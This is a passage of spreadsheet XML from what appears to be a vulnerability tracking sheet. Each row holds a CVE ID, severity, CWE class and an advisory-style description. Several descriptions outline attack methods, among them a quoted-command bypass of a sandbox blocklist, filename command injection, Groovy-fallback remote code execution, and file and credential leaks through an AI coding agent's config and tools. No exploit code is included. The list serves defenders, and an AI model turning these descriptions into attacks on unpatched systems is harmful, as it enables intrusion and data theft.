      <c r="L1227" s="5" t="inlineStr">
        <is>
          <t>Network-AI versions before 5.15.1 contain a security matcher bypass vulnerability where SandboxPolicy evaluates raw command strings with quotes preserved while the executor tokenizes commands by stripping quotes before execution. Attackers can craft quoted commands that evade blocklist checks and approval gates while the executor runs the identical unquoted dangerous argv.</t>
        </is>
      </c>
      <c r="M1227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73615</t>
        </is>
      </c>
    </row>
    <row r="1228">
      <c r="A1228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73693</t>
        </is>
      </c>
      <c r="C1228" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1228" s="5" t="inlineStr"/>
      <c r="F1228" s="5" t="inlineStr"/>
      <c r="G1228" s="5" t="inlineStr"/>
      <c r="H1228" s="5" t="inlineStr"/>
      <c r="I1228" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1228" s="5" t="inlineStr"/>
      <c r="K1228" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1228" s="5" t="inlineStr">
        <is>
          <t>FileRun before 2026.3.0 contains an OS command injection vulnerability in the PhotoProofSheet handler that allows authenticated users with upload permission to execute arbitrary commands by uploading files with shell metacharacters in their names. Attackers can upload a file containing command substitution syntax such as backticks, semicolons, or $() sequences in the filename, then trigger the PhotoProofSheet endpoint to execute arbitrary commands as the web-server user due to missing escapeshellarg() sanitization in the ImageMagick montage command construction.</t>
        </is>
      </c>
      <c r="M1228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73693</t>
        </is>
      </c>
    </row>
    <row r="1229">
      <c r="A1229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74787</t>
        </is>
      </c>
      <c r="C1229" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1229" s="5" t="inlineStr"/>
      <c r="F1229" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1229" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H1229" s="5" t="inlineStr"/>
      <c r="I1229" s="5" t="inlineStr">
        <is>
          <t>2026-08-16</t>
        </is>
      </c>
      <c r="J1229" s="5" t="inlineStr"/>
      <c r="K1229" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L1229" s="5" t="inlineStr">
        <is>
          <t>Scriban before 7.0.0 contains an uncontrolled recursion vulnerability in the object.to_json builtin function that lacks depth limits and circular reference detection. Attackers can craft templates with self-referencing objects to trigger unbounded recursion, causing a StackOverflowException that fatally terminates the hosting .NET process.</t>
        </is>
      </c>
      <c r="M1229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74787</t>
        </is>
      </c>
    </row>
    <row r="1230">
      <c r="A1230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74792</t>
        </is>
      </c>
      <c r="C1230" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1230" s="5" t="inlineStr"/>
      <c r="F1230" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1230" s="5" t="inlineStr"/>
      <c r="H1230" s="5" t="inlineStr"/>
      <c r="I1230" s="5" t="inlineStr">
        <is>
          <t>2026-08-16</t>
        </is>
      </c>
      <c r="J1230" s="5" t="inlineStr"/>
      <c r="K1230" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L1230" s="5" t="inlineStr">
        <is>
          <t>Scriban before 7.0.0 (affected versions &lt;= 6.6.0) contains a stack overflow vulnerability in nested array initializer parsing. Deeply nested array initializers recurse through a path (ParseArrayInitializer → ParseExpression → ParseArrayInitializer) that is not covered by the ExpressionDepthLimit counter added in the fix for GHSA-wgh7-7m3c-fx25. An attacker who can supply untrusted input to Template.Parse can trigger an uncatchable StackOverflowException that immediately terminates the process, even with the default ExpressionDepthLimit enabled.</t>
        </is>
      </c>
      <c r="M1230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74792</t>
        </is>
      </c>
    </row>
    <row r="1231">
      <c r="A1231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75124</t>
        </is>
      </c>
      <c r="C1231" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1231" s="5" t="inlineStr"/>
      <c r="F1231" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1231" s="5" t="inlineStr"/>
      <c r="H1231" s="5" t="inlineStr"/>
      <c r="I1231" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1231" s="5" t="inlineStr"/>
      <c r="K1231" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L1231" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains a pre-authentication memory corruption vulnerability in the web management interface where the _readHttpParam function copies an oversized HTTP query string without guaranteeing NUL termination, allowing parse_query_string to process attacker-controlled data into a fixed-size stack buffer. An unauthenticated remote attacker can send an oversized GET request to dispatcher.cgi to cause denial of service of the web management interface and potentially trigger memory corruption.</t>
        </is>
      </c>
      <c r="M1231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75124</t>
        </is>
      </c>
    </row>
    <row r="1232">
      <c r="A1232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75133</t>
        </is>
      </c>
      <c r="C1232" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1232" s="5" t="inlineStr"/>
      <c r="F1232" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1232" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H1232" s="5" t="inlineStr"/>
      <c r="I1232" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1232" s="5" t="inlineStr"/>
      <c r="K1232" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1232" s="5" t="inlineStr">
        <is>
          <t>Keep Backup Daily plugin for WordPress before 2.1.4 contains a sensitive information exposure vulnerability that allows unauthenticated attackers to trigger a full MySQL database dump by accessing the publicly exposed `kbd_cron_process` parameter without authentication. Attackers can predict the partially predictable dump filename based on the database name, a limited random range, and the current Unix timestamp to download the generated backup from the publicly accessible uploads directory.</t>
        </is>
      </c>
      <c r="M1232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75133</t>
        </is>
      </c>
    </row>
    <row r="1233">
      <c r="A1233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75584</t>
        </is>
      </c>
      <c r="C1233" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1233" s="5" t="inlineStr"/>
      <c r="F1233" s="5" t="inlineStr"/>
      <c r="G1233" s="5" t="inlineStr"/>
      <c r="H1233" s="5" t="inlineStr"/>
      <c r="I1233" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1233" s="5" t="inlineStr"/>
      <c r="K1233" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L1233" s="5" t="inlineStr">
        <is>
          <t>ION-DTN before 4.2.1-a.1 contains a denial of service vulnerability that allows unauthenticated remote attackers to crash the ION process by sending a BPv7 bundle with a zero-length payload. The canonicalizePayloadBlock() function in bpsec_util.c passes bundle-&gt;payload.length to zco_clone() without validating it against zero, causing a failed CHKZERO assertion that triggers sm_Abort() and terminates the process with SIGABRT before any HMAC verification occurs, requiring no valid key or credential to exploit.</t>
        </is>
      </c>
      <c r="M1233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75584</t>
        </is>
      </c>
    </row>
    <row r="1234">
      <c r="A1234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75596</t>
        </is>
      </c>
      <c r="C1234" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1234" s="5" t="inlineStr"/>
      <c r="F1234" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1234" s="5" t="inlineStr">
        <is>
          <t>java, .net</t>
        </is>
      </c>
      <c r="H1234" s="5" t="inlineStr"/>
      <c r="I1234" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1234" s="5" t="inlineStr"/>
      <c r="K1234" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1234" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Final and 4.2.17.Final, the default io.netty.handler.ssl.SniHandler constructors use the pre-handshake ClientHello aggregation path in handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java at io.netty.handler.ssl.SslClientHelloHandler#decode, where handshakeBuffer.clear() and writeBytes() recopy all previously received body bytes for every additional TLS record. An unauthenticated remote peer can advertise a large ClientHello and deliver its body in thousands of tiny records, causing quadratic CPU work on the event loop before the TLS handshake completes and degrading TLS handling for other clients. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.</t>
        </is>
      </c>
      <c r="M1234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75596</t>
        </is>
      </c>
    </row>
    <row r="1235">
      <c r="A1235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75813</t>
        </is>
      </c>
      <c r="C1235" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1235" s="5" t="inlineStr"/>
      <c r="F1235" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1235" s="5" t="inlineStr"/>
      <c r="H1235" s="5" t="inlineStr"/>
      <c r="I1235" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1235" s="5" t="inlineStr"/>
      <c r="K1235" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1235" s="5" t="inlineStr">
        <is>
          <t>Certain configuration endpoints may lack proper server-side 
authorization checks, allowing unauthorized users to access or modify 
sensitive device settings. This could result in full compromise of 
device functionality.</t>
        </is>
      </c>
      <c r="M1235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75813</t>
        </is>
      </c>
    </row>
    <row r="1236">
      <c r="A1236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75836</t>
        </is>
      </c>
      <c r="C1236" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1236" s="5" t="inlineStr"/>
      <c r="F1236" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1236" s="5" t="inlineStr"/>
      <c r="H1236" s="5" t="inlineStr"/>
      <c r="I1236" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1236" s="5" t="inlineStr"/>
      <c r="K1236" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1236" s="5" t="inlineStr">
        <is>
          <t>The Grav API plugin (getgrav/grav-plugin-api, bundled with Grav's admin-next/API stack) before 1.0.14 fails to enforce the authorize requirement in MenubarController::executeAction(). While the GET /menubar/items listing endpoint correctly filters menubar items via userPassesAuthorize(), the POST /api/v1/menubar/actions/{plugin}/{action} endpoint only checks the baseline api.access permission and never evaluates the authorize field a plugin registered for that action. Any authenticated caller with api.access can therefore invoke a privileged menubar action directly, bypassing the intended authorization. No plugin bundled with core Grav currently registers a privileged authorize handler, so on a stock install the impact is latent; the flaw affects any first- or third-party plugin relying on the documented authorize semantics.</t>
        </is>
      </c>
      <c r="M1236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75836</t>
        </is>
      </c>
    </row>
    <row r="1237">
      <c r="A1237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75840</t>
        </is>
      </c>
      <c r="C1237" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1237" s="5" t="inlineStr"/>
      <c r="F1237" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1237" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1237" s="5" t="inlineStr"/>
      <c r="I1237" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1237" s="5" t="inlineStr"/>
      <c r="K1237" s="5" t="inlineStr">
        <is>
          <t>CWE-1025</t>
        </is>
      </c>
      <c r="L1237" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.8.1 contains an arbitrary file read vulnerability in the GraalVM JavaScript sandbox allowlist enforcement, which uses unescaped regular expressions to validate package names. Attackers with trigger creation privileges can use Java.type() to access java.util.zip.ZipFile or java.util.jar.JarFile classes and read arbitrary files on the host system as the ArcadeDB server process.</t>
        </is>
      </c>
      <c r="M1237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75840</t>
        </is>
      </c>
    </row>
    <row r="1238">
      <c r="A1238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75853</t>
        </is>
      </c>
      <c r="C1238" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1238" s="5" t="inlineStr"/>
      <c r="F1238" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1238" s="5" t="inlineStr"/>
      <c r="H1238" s="5" t="inlineStr"/>
      <c r="I1238" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1238" s="5" t="inlineStr"/>
      <c r="K1238" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1238" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB's Gremlin wire-protocol plugin (com.arcadedb:arcadedb-gremlin) in versions &lt;= 26.7.3 enforces authentication (SASL PLAIN) but performs no authorization: it never checks database access permissions (canAccessToDatabase) and never binds the authenticated principal into the engine. As a result, any valid server credential — even one provisioned for zero or one unrelated database — can read, write, and drop data in any database on the server by selecting a target database via a traversal-source alias, completely bypassing the engine's per-type/read-only/UPDATE_SCHEMA ACLs. The issue is fixed in version 26.8.1.</t>
        </is>
      </c>
      <c r="M1238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75853</t>
        </is>
      </c>
    </row>
    <row r="1239">
      <c r="A1239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75859</t>
        </is>
      </c>
      <c r="C1239" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1239" s="5" t="inlineStr"/>
      <c r="F1239" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1239" s="5" t="inlineStr"/>
      <c r="H1239" s="5" t="inlineStr"/>
      <c r="I1239" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1239" s="5" t="inlineStr"/>
      <c r="K1239" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1239" s="5" t="inlineStr">
        <is>
          <t>CodeWhale versions before 0.8.64 fail to validate file paths in the project config instructions field, allowing attackers to read arbitrary files on the victim's system. A malicious .codewhale/config.toml file in a cloned repository can specify paths outside the workspace that are read and injected into the AI system prompt for exfiltration.</t>
        </is>
      </c>
      <c r="M1239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75859</t>
        </is>
      </c>
    </row>
    <row r="1240">
      <c r="A1240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75914</t>
        </is>
      </c>
      <c r="C1240" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1240" s="5" t="inlineStr"/>
      <c r="F1240" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1240" s="5" t="inlineStr"/>
      <c r="H1240" s="5" t="inlineStr"/>
      <c r="I1240" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1240" s="5" t="inlineStr"/>
      <c r="K1240" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1240" s="5" t="inlineStr">
        <is>
          <t>CodeWhale versions before 0.8.64 contain a path traversal vulnerability in the image_analyze tool that fails to canonicalize symlinks before reading files. Attackers can create workspace symlinks pointing to external files with image extensions to leak file bytes to the vision endpoint without user approval.</t>
        </is>
      </c>
      <c r="M1240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75914</t>
        </is>
      </c>
    </row>
    <row r="1241">
      <c r="A1241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75915</t>
        </is>
      </c>
      <c r="C1241" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1241" s="5" t="inlineStr"/>
      <c r="F1241" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1241" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H1241" s="5" t="inlineStr"/>
      <c r="I1241" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1241" s="5" t="inlineStr"/>
      <c r="K1241" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1241" s="5" t="inlineStr">
        <is>
          <t>CodeWhale versions before 0.8.64 contain an environment variable exposure vulnerability in the js_execution tool that fails to scrub parent process environment variables before spawning Node.js. Attackers can craft malicious JavaScript code executed by the tool to read process.env and leak API keys, cloud credentials, and authentication tokens back to the model context.</t>
        </is>
      </c>
      <c r="M1241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75915</t>
        </is>
      </c>
    </row>
    <row r="1242">
      <c r="A1242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75960</t>
        </is>
      </c>
      <c r="C1242" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1242" s="5" t="inlineStr"/>
      <c r="F1242" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1242" s="5" t="inlineStr"/>
      <c r="H1242" s="5" t="inlineStr"/>
      <c r="I1242" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1242" s="5" t="inlineStr"/>
      <c r="K1242" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L1242" s="5" t="inlineStr">
        <is>
          <t>Rently Smart Home versions 20.1.0 and prior are vulnerable to an Insufficiently Protected Credentials vulnerability. This could allow an attacker to retrieve pins including the Master Pin, overriding standard user permissions.</t>
        </is>
      </c>
      <c r="M1242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75960</t>
        </is>
      </c>
    </row>
    <row r="1243">
      <c r="A1243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76224</t>
        </is>
      </c>
      <c r="C1243" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1243" s="5" t="inlineStr"/>
      <c r="F1243" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1243" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1243" s="5" t="inlineStr"/>
      <c r="I1243" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1243" s="5" t="inlineStr"/>
      <c r="K1243" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1243" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.8.1 (arcadedb-gremlin, affected &lt;= 26.7.3) contains a remote code execution vulnerability in its Gremlin query engine. Although the engine defaults to the documented-secure java (gremlin-lang) engine, ArcadeGremlin.executeStatement() silently falls back to the insecure Groovy engine whenever a request carries any query parameter and the query does not parse as gremlin-lang. An authenticated user with any database role, including a read-only reader, can submit a parameterized Gremlin query to trigger the Groovy fallback and execute arbitrary operating system commands as the ArcadeDB server process user.</t>
        </is>
      </c>
      <c r="M1243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76224</t>
        </is>
      </c>
    </row>
    <row r="1244">
      <c r="A1244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76639</t>
        </is>
      </c>
      <c r="C1244" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1244" s="5" t="inlineStr"/>
      <c r="F1244" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1244" s="5" t="inlineStr"/>
      <c r="H1244" s="5" t="inlineStr"/>
      <c r="I1244" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1244" s="5" t="inlineStr"/>
      <c r="K1244" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-306</t>
        </is>
      </c>
      <c r="L1244" s="5" t="inlineStr">
        <is>
          <t>Unitree G1 EDU firmware through 1.5.2 contains an unauthenticated remote code execution vulnerability that allows network-adjacent attackers to execute arbitrary commands as root by chaining three weaknesses: an unauthenticated WebRTC-to-DDS bridge on TCP port 9991, a static AES-128 key stored with world-readable permissions, and a path traversal flaw in the chat_go knowledge upload API. Attackers can publish DDS control messages to restart the bashrunner service, plant a malicious payload in its script execution directory via path traversal, and trigger execution of that payload as uid 0 through the bashrunner shell subprocess.</t>
        </is>
      </c>
      <c r="M1244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76639</t>
        </is>
      </c>
    </row>
    <row r="1245">
      <c r="A1245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77101</t>
        </is>
      </c>
      <c r="C1245" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1245" s="5" t="inlineStr"/>
      <c r="F1245" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1245" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1245" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1245" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1245" s="5" t="inlineStr"/>
      <c r="K1245" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1245" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a stack-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="M1245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77101</t>
        </is>
      </c>
    </row>
    <row r="1246">
      <c r="A1246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77102</t>
        </is>
      </c>
      <c r="C1246" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1246" s="5" t="inlineStr"/>
      <c r="F1246" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1246" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1246" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1246" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1246" s="5" t="inlineStr"/>
      <c r="K1246" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1246" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a heap-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="M1246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77102</t>
        </is>
      </c>
    </row>
    <row r="1247">
      <c r="A1247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77103</t>
        </is>
      </c>
      <c r="C1247" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1247" s="5" t="inlineStr"/>
      <c r="F1247" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1247" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1247" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1247" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1247" s="5" t="inlineStr"/>
      <c r="K1247" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L1247" s="5" t="inlineStr">
        <is>
          <t>CommServe contained an authentication bypass issue affecting access authorization and information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="M1247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77103</t>
        </is>
      </c>
    </row>
    <row r="1248">
      <c r="A1248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77105</t>
        </is>
      </c>
      <c r="C1248" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1248" s="5" t="inlineStr"/>
